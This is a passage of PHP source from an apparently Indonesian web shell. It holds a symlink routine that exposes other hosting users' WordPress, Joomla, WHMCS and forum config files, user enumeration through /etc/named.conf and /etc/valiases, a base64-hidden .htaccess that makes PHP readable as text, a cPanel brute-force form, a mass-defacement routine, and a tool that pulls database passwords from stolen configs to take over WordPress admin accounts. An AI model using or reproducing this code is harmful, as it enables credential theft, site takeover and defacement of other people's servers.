809. symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
810. symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
811. symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
812. symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
813. symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
814. symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
815. symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
816. symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
817. symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
818. symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
819. symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
820. symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
821. symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
822. symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
823. symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
824. symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
825. symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
826. symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
827. symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
828. symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
829. symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
830. symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
831. symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
832. symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
833. symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
834. symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
835. symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
836. symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
837. symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
838. symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
839. symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
840. symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
841. symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
842. symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
843. symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
844. symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
845. symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
846. symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
847. symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
848. symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
849. symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
850. symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
851. symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
852. symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
853. symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
854. symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
855. symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
856. symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
857. symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
858. symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
859. symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
860. symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
861. symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
862. symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
863. symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
864. symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
865. symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
866. symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
867. symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
868. symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
869. symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
870. symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
871. symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
872. symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
873. symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
874. symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
875. symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
876. symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
877. symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
878. symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
879. symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
880. symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
881. symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
882. symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
883. symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
884. symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
885. symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
886. symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
887. symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
888. symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
889. symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
890. symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
891. symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
892. symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
893. symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
894. symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
895. symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
896. symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
897. symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
898. symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
899. symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
900. symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
901. symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
902. symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
903. symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
904. symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
905. symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
906. symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
907. symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
908. symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
909. symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
910. symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
911. symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
912. symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
913. symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
914. symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
915. symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
916. symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
917. symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
918. symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
919. symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
920. symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
921. symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
922. symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
923. symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
924. symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
925. symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
926. symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
927. symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
928. symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
929. symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
930. symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
931. symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
932. symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
933. symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
934. symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
935. symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
936. symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
937. symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
938. symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
939. symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
940. symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
941. symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
942. symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
943. symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
944. symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
945. symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
946. symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
947. symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
948. symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
949. symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
950. symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
951. symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
952. symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
953. symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
954. symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
955. symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
956. symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
957. symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
958. symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
959. symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
960. symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
961. symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
962. symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
963. symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
964. symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
965. symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
966. symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
967. symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
968. symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
969. symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
970. symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
971. symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
972. symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
973. symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
974. symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
975. symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
976. symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
977. symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
978. symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
979. symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
980. symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
981. symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
982. symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
983. symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
984. symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
985. symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
986. symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
987. symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
988. symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
989. symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
990. symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
991. symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
992. symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
993. symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
994. symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
995. symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
996. symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
997. symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
998. symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
999. }
1000.  
1001. $d0mains = @file("/etc/named.conf");
1002.  
1003. if($d0mains)
1004. {
1005. mkdir($fn);
1006. chdir($fn);
1007.  
1008. foreach($d0mains as $d0main)
1009. {
1010. if(eregi("zone",$d0main))
1011. {
1012. preg_match_all('#zone "(.*)"#', $d0main, $domains);
1013. flush();
1014.  
1015. if(strlen(trim($domains[1][0])) > 2)
1016. {
1017. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1018.  
1019. syml($user['name'],$domains[1][0]);
1020. }
1021. }
1022. }
1023. echo "<center><font color=springgreen size=3>Done</font></center>";
1024. echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>Here</font></a></center>";
1025. }
1026. else
1027. {
1028. mkdir($fn);
1029. chdir($fn);
1030. $temp = "";
1031. $val1 = 0;
1032. $val2 = 1000;
1033. for(;$val1 <= $val2;$val1++)
1034. {
1035. $uid = @posix_getpwuid($val1);
1036. if ($uid)
1037. $temp .= join(':',$uid)."\n";
1038. }
1039. echo '<br/>';
1040. $temp = trim($temp);
1041.  
1042. $file5 = fopen("test.txt","w");
1043. fputs($file5,$temp);
1044. fclose($file5);
1045.  
1046. $htaccess =
1047. 'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
1048. aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
1049. biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
1050. ';
1051. $file = fopen(".htaccess","w+");
1052. $write = fwrite ($file ,base64_decode($htaccess));
1053.  
1054. $file = fopen("test.txt", "r") or exit("Unable to open file!");
1055. while(!feof($file))
1056. {
1057. $s = fgets($file);
1058. $matches = array();
1059. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1060. $matches = str_replace("home/","",$matches[1]);
1061. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1062. continue;
1063. syml($matches,$matches);
1064. }
1065. fclose($file);
1066. echo "</table>";
1067. unlink("test.txt");
1068. echo "<center><font color=springgreen size=3>Done</font></center>";
1069. echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>Here</font></a></center>";
1070. }
1071. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
1072. exit;
1073. }
1074. ?>
1075. <form method="POST" target="_blank">
1076. <input name="page" type="hidden" value="find">
1077. <table border=1>
1078. <body bgcolor="black" text="white"><br><br>
1079.  
1080. <center><b><font size="2" style="italic" color="white">Cpanel BruteForce<br><br></b></center></td></tr>
1081. <tr>
1082. <td>
1083. <strong>User :</strong>
1084. </td>
1085. <td>
1086. <strong><textareacols="50" style="background:#191818;outline:none;color:white;" rows="5" name="usernames"><?php system('ls /var/mail');?></textarea></strong>
1087. </td>
1088. <tr>
1089. <td>
1090. <strong>Pass :</strong>
1091. </td>
1092. <td>
1093. <strong><textarea cols="50" style="background:#191818;outline:none;color:white;" rows="5" name="passwords"></textarea></strong>
1094. </td>
1095. </tr>
1096. <tr>
1097. <td>
1098. <strong>Type :</strong>
1099. </td>
1100. <td>
1101. <span style="background:#191818;outline:none;color:white;"><strong>Simple : </strong> </span>
1102. <strong>
1103. <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
1104. <font style="background:black;outline:none;color:white;"><strong>/etc/passwd : </strong> </font>
1105. <strong>
1106. <input type="radio" name="type" value="passwd" style="background:black;outline:none;color:white;"></strong><span class="style3"><strong>
1107. </strong>
1108. </span>
1109. <td style="background:black;outline:none;color:white;" >
1110. <strong><input class ='bordergaya' type="submit" value="START"></strong>
1111. </td>
1112. </tr>
1113. </table>
1114. <br>
1115. <table border=1>
1116. </form>
1117. <tr>
1118. <td style="background:black;outline:none;color:white;">
1119. <strong>Get Wordlist</strong>
1120. <form method="POST" target="_blank">
1121. <strong>
1122. <input name="pass" type="hidden" value="password">
1123. </strong>
1124. <strong>Url Config :</strong>
1125. <td>
1126.  
1127. <strong>
1128. <input style="background:black;outline:none;color:white;" size="80" name="url" type="text"></strong>
1129.  
1130. <td style="background:black;outline:none;color:white;"><strong><input class ='bordergaya' type="submit" value="GO">
1131. </strong>
1132. </td>
1133. </table>
1134. <?php
1135. echo"<br/><br/>";
1136. die();
1137. }
1138. elseif(isset($_GET['x']) && ($_GET['x'] == 'massde'))
1139. {
1140. ?></center></center>
1141. <style type="text/css">
1142. .ketengah{
1143. text-align: left;
1144. font-size: 16px;
1145. color: orange;
1146. font-family: Homenaje;
1147. margin-left: 18%;
1148. </style>
1149. <?php
1150. /*thanks To IndoXploit*/
1151. function sabun_massal($path,$namafile,$isi_script) {
1152. if(is_writable($path)) {
1153. $patha = scandir($path);
1154. foreach($patha as $pathb) {
1155. $pathc = "$path/$pathb";
1156. $lokasi = $pathc.'/'.$namafile;
1157. if($pathb === '.') {
1158. file_put_contents($lokasi, $isi_script);
1159. } elseif($pathb === '..') {
1160. file_put_contents($lokasi, $isi_script);
1161. } else {
1162. if(is_dir($pathc)) {
1163. if(is_writable($pathc)) {
1164. echo "<font class='ketengah'><font color=crimson>-:-</font><font color=white>Sukses Bos Q</font><font color=crimson>-:-</font> <font color=springgreen>Cek di :</font> $lokasi</font><br>";
1165. file_put_contents($lokasi, $isi_script);
1166. $idx = sabun_massal($pathc,$namafile,$isi_script);
1167. }
1168. }
1169. }
1170. }
1171. }
1172. }
1173. if($_POST['start']) {
1174. echo "<div style='margin: 5px auto; padding: 5px'>";
1175. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
1176. echo "</div>";
1177. } else {
1178. echo "<center>";
1179. echo "<form method='post'><br><br>
1180. <table>
1181. <tr>
1182. <td><font style='text-decoration: underline; margin-left:10px;'>Folder</font></td>
1183. <td align='center'>:</td>
1184. <td><input class='justborder' type='text' name='d_dir' value='$path' style='width: 95%;' height='10'><br></td>
1185. </tr>
1186. <tr>
1187. <td><font style='text-decoration: underline; margin-left:10px;'>Filename</font></td>
1188. <td align='center'>:</td>
1189. <td><input class='justborder' type='text' name='d_file' value='hacked.html' style='width: 95%;' height='10'><br></td>
1190. </tr>
1191. <tr>
1192. <td colspan='3' align='center'><font style='text-decoration: underline;'>Script Deface : </font><br></td>
1193. </tr>
1194. <tr>
1195. <td colspan='3'><textarea class='justborder' name='script' style='width: 500px; height: 200px;'>Hacked by Stupidc0de Family!</textarea><br></td>
1196. </tr>
1197. <tr>
1198. <td colspan='3' align='center'><input class='justborder' type='submit' name='start' value='Mass Deface' style='width: 50%;'><br/></td>
1199. </tr>
1200. </table><br><br><br>
1201. </form></center><br/>";
1202. }die();?><center><center><?php
1203. }
1204. elseif(isset($_GET['x']) && ($_GET['x'] == 'mpc'))
1205. {
1206. ?>
1207. <form action="?path=<?php echo $path; ?>&amp;x=mpc" method="post">
1208. <?php
1209. set_time_limit(0);
1210. ini_set('display_errors', 0);
1211.  
1212. echo '<center><h2>WordPress Mass Password Changer</h2></center>';
1213. echo '<form method="POST" action="" >
1214. <center><table border="1" class="justborder"><tr><td>Config List:</td>
1215. <td><textarea class="justborder" name="url" cols="50" rows="10" ></textarea></td></tr>
1216. <tr><td>User/Password</td><td><input class="justborder" type="text" name="username" size="25" value="Psrmrh"> /
1217. <input class="justborder" type="text" name="password" size="25" value="stupidc0de"></td></tr></table>
1218. <br><input class="bordergaya" type="Submit" class="button" value="Submit"><input type="hidden" name="action" value="1"></form></center>';
1219.  
1220. if ($_POST['action']=='1'){
1221. if ($_POST['url']==''){
1222. echo "<div class='result'>No CONFIG FOUND<br>Make sure you provided a config list!</div><br>";
1223. }else{
1224. $url=$_POST['url'];
1225. $users = explode("\n",$url);
1226. foreach ($users as $user) {
1227. $user1=trim($user);
1228. $code=file_get_contents2($user1);
1229. preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
1230. $db=$b1[1][0];
1231. preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
1232. $user=$b2[1][0];
1233. preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
1234. $db_password=$b3[1][0];
1235. preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
1236. $host=$b4[1][0];
1237. preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
1238. $p=$b5[1][0];
1239.  
1240. $d=@mysql_connect( $host, $user, $db_password ) ;
1241. if ($d){
1242. @mysql_select_db($db );
1243. $usern=$_POST['username'];
1244. $passwd=$_POST['password'];
1245. $sql = "UPDATE `".$p."users` SET `user_pass` = MD5( '".$passwd."' ) WHERE `ID` = '1';";
1246. @mysql_query($sql) ; ;
1247. $sql = "UPDATE `".$p."users` SET `user_login` = '".$usern."' WHERE `ID` = '1';";
1248. @mysql_query($sql) ; ;
1249. $aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
1250. $siteurl=@mysql_fetch_array($aa) ;
1251. $siteurl=$siteurl['option_value'];
1252. $tr.="$siteurl\n";
1253. mysql_close();
1254. }
1255. }
1256. if ($tr)
1257. $filename = 'changed.txt';
1258. $fp = fopen($filename, "a+");
1259. $write = fputs($fp, $tr);
1260. fclose($fp);
1261. echo "<div class='result'>Password Changing Completed ! :)<br><br>";
1262. echo "<a href='changed.txt' target='_blank'>View List of Password Changed Sites</a></div><br/>";
1263.  
1264. }
1265. }
1266. function file_get_contents2($u){
1267. $ch = curl_init();
1268. curl_setopt($ch,CURLOPT_URL,$u);
1269. curl_setopt($ch, CURLOPT_HEADER, 0);
1270. curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
1271. curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
1272. $result = curl_exec($ch);
1273. return $result ;
1274. }
1275. echo "<br /><br />";
1276. die();
1277. ?>
1278. <?php }
1279. elseif(isset($_GET['x']) && ($_GET['x'] == 'masstool'))
1280. {
1281. echo "<br/><br/>Monggo Pilih Toolsnya Bos Q ~_^<br/><br/>";
1282. ?>
1283. <a href="?<?php echo "path=".$path; ?>&amp;x=massde"><input class=bordergaya type=submit value="Mass Deface" /></a>
1284. Or <a href="?<?php echo "path=".$path; ?>&amp;x=mpc"><input class=bordergaya type=submit value="Wordpress Mass Password Changer" /></a>
1285. Or <a href="?<?php echo "path=".$path; ?>&amp;x=zonesH"><input class=bordergaya type=submit value="Zone-H Mass Notifier" /></a>
1286. <br/><br/><br/><br/><br/>
1287.  
1288. <?php
1289. die();
1290. }
1291. elseif(isset($_GET['x']) && ($_GET['x'] == 'tentang'))
1292. {
1293. echo"<br><br>
1294. <center><b>
1295. <font face='Jolly Lodger' color='red' size='6px'>Indonesian <font color='white'> Hacker</font><br>
1296. <br>
1297.  
1298. </center>
1299. </b>";
1300. die();
1301. }
1302.  
1303.  
1304. elseif(isset($_GET['x']) && ($_GET['x'] == 'cpanel')){
1305. echo "<br/><br/>Monggo Pilih Toolsnya Bos Q ~_^<br/><br/>";
1306. ?>
1307.  
